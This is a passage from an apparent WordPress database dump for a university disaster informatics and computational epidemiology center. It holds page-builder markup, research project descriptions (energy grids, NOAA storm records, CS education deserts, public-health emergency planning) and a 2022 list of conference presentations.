d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:36:59','2022-02-16 18:36:59','',22,'https://gsudice.dataconn.net/?p=412',0,'revision','',0),(430,1,'2022-02-18 19:20:15','2022-02-18 19:20:15','','ewsimage','','inherit','open','closed','','ewsimage','','','2022-02-18 19:20:15','2022-02-18 19:20:15','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/ewsimage.png',0,'attachment','image/png',0),(432,1,'2022-02-18 19:22:30','2022-02-18 19:22:30','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-ewsimage.png','cropped-ewsimage.png','','inherit','open','closed','','cropped-ewsimage-png','','','2022-02-18 19:22:30','2022-02-18 19:22:30','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-ewsimage.png',0,'attachment','image/png',0),(433,1,'2022-02-18 19:23:40','2022-02-18 19:23:40','','Unweighted Monday','','inherit','open','closed','','unweighted-monday','','','2022-02-18 19:23:40','2022-02-18 19:23:40','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/Unweighted-Monday.png',0,'attachment','image/png',0),(434,1,'2022-02-18 19:25:08','2022-02-18 19:25:08','','word-cloud','','inherit','open','closed','','word-cloud','','','2022-02-18 19:25:08','2022-02-18 19:25:08','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/word-cloud.png',0,'attachment','image/png',0),(435,1,'2022-02-18 19:25:23','2022-02-18 19:25:23','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-word-cloud.png','cropped-word-cloud.png','','inherit','open','closed','','cropped-word-cloud-png','','','2022-02-18 19:25:23','2022-02-18 19:25:23','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-word-cloud.png',0,'attachment','image/png',0),(436,1,'2022-02-18 19:32:35','2022-02-18 19:32:35','','kevin-ku-w7ZyuGYNpRQ-unsplash','','inherit','open','closed','','kevin-ku-w7zyugynprq-unsplash','','','2022-02-18 19:32:35','2022-02-18 19:32:35','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/kevin-ku-w7ZyuGYNpRQ-unsplash.jpg',0,'attachment','image/jpeg',0),(437,1,'2022-02-18 19:32:45','2022-02-18 19:32:45','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg','cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg','','inherit','open','closed','','cropped-kevin-ku-w7zyugynprq-unsplash-scaled-1-jpg','','','2022-02-18 19:32:45','2022-02-18 19:32:45','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(438,1,'2022-02-18 19:33:00','2022-02-18 19:33:00','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 7\",\"attrs\":{\"id\":\"about-7\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c47\",\"parentId\":\"126-c46\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c47\",\"index\":0,\"id\":\"126-c48\",\"partialId\":126,\"styleRef\":876,\"type\":\"content\",\"props\":{\"content\":\"DICE Data Repository\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c47\",\"index\":2,\"id\":\"126-c50\",\"partialId\":126,\"styleRef\":878,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(64, 85, 169);\\\">The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <\\/span><\\/p>\"}}],\"styleRef\":875,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c51\",\"parentId\":\"126-c46\",\"partialId\":126,\"styleRef\":879,\"type\":\"content\"}],\"id\":\"126-c46\",\"parentId\":\"126-c45\",\"partialId\":126,\"styleRef\":874,\"type\":\"content\"}],\"id\":\"126-c45\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":873,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','publish','closed','closed','','438','','','2023-09-29 11:19:47','2023-09-29 15:19:47','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=438',0,'extb_post_json','',0),(449,1,'2022-02-18 19:35:37','2022-02-18 19:35:37','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"449-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-377 style-local-449-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"449-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-378 style-local-449-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-379-outer style-local-449-c4-outer\">\n <div data-colibri-id=\"449-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-379 style-local-449-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"449-c5\" class=\"h-text h-text-component style-380 style-local-449-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2022</strong></p>\n <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n American Association of Geographers, Annual Meeting 2022.</p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Presentations','','publish','closed','closed','','conference-presentations','','','2022-03-17 21:15:02','2022-03-18 01:15:02','',0,'https://gsudice.dataconn.net/?page_id=449',0,'page','',0),(451,1,'2022-02-18 19:35:37','2022-02-18 19:35:37','','Conference Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-02-18 19:35:37','2022-02-18 19:35:37','',449,'https://gsudice.dataconn.net/?p=451',0,'revision','',0),(456,1,'2022-02-18 19:37:11','2022-02-18 19:37:11','','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-02-18 19:37:11','2022-02-18 19:37:11','',449,'https://gsudice.dataconn.net/?p=456',0,'revision','',0),(497,1,'2022-03-17 20:30:37','2022-03-18 00:30:37','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"449-c4\",\"parentId\":\"449-c3\",\"partialId\":449,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"449-c4\",\"index\":0,\"id\":\"449-c5\",\"partialId\":449,\"styleRef\":380,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p>\"}}],\"styleRef\":379,\"type\":\"content\"}],\"id\":\"449-c3\",\"parentId\":\"449-c2\",\"partialId\":449,\"styleRef\":378,\"type\":\"content\"}],\"id\":\"449-c2\",\"parentId\":\"449-c1\",\"partialId\":449,\"styleRef\":377,\"type\":\"content\"}]}','','','publish','closed','closed','','497','','','2022-03-17 21:15:02','2022-03-18 01:15:02','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=497',0,'extb_post_json','',0),(498,1,'2022-03-17 20:30:37','2022-03-18 00:30:37','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"449-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-369 style-local-449-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"449-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-370 style-local-449-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-371-outer style-local-449-c4-outer\">\n <div data-colibri-id=\"449-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-371 style-local-449-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"449-c5\" class=\"h-text h-text-component style-372 style-local-449-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>Presentations</strong></p>\n <p>\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:30:37','2022-03-18 00:30:37','',449,'https://gsudice.dataconn.net/?p=498',0,'revision','',0),(504,1,'2022-03-17 20:31:17','2022-03-18 00:31:17','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\"}','','','inherit','closed','closed','','497-revision-v1','','','2022-03-17 20:31:17','2022-03-18 00:31:17','',497,'https://gsudice.dataconn.net/?p=504',0,'revision','',0),(505,1,'2022-03-17 20:31:17','2022-03-18 00:31:17','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n <!---->\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:31:17','2022-03-18 00:31:17','',449,'https://gsudice.dataconn.net/?p=505',0,'revision','',0),(510,1,'2022-03-17 20:34:15','2022-03-18 00:34:15','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n <!---->\n</div>\n\n<!-- wp:paragraph -->\n<p>2022<a href=\"https://honors.gsu.edu/\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Georgia State Undergraduate Research Conference (GSURC) </p>\n<!-- /wp:paragraph -->','Presentations','','inherit','closed','closed','','449-autosave-v1','','','2022-03-17 20:34:15','2022-03-18 00:34:15','',449,'https://gsudice.dataconn.net/?p=510',0,'revision','',0),(511,1,'2022-03-17 20:34:16','2022-03-18 00:34:16','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n <!---->\n</div>\n\n<!-- wp:paragraph -->\n<p>2022<a href=\"https://honors.gsu.edu/\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Georgia State Undergraduate Research Conference (GSURC) </p>\n<!-- /wp:paragraph -->','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:34:16','2022-03-18 00:34:16','',449,'https://gsudice.dataconn.net/?p=511',0,'revision','',0),(512,1,'2022-03-17 20:34:59','2022-03-18 00:34:59','<!-- wp:paragraph -->\n<p><a href=\"https://honors.gsu.edu/\"></a></p>\n<!-- /wp:paragraph -->','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:34:59','2022-03-18 00:34:59','',449,'https://gsudice.dataconn.net/?p=512',0,'revision','',0),(514,1,'2022-03-17 20:43:34','2022-03-18 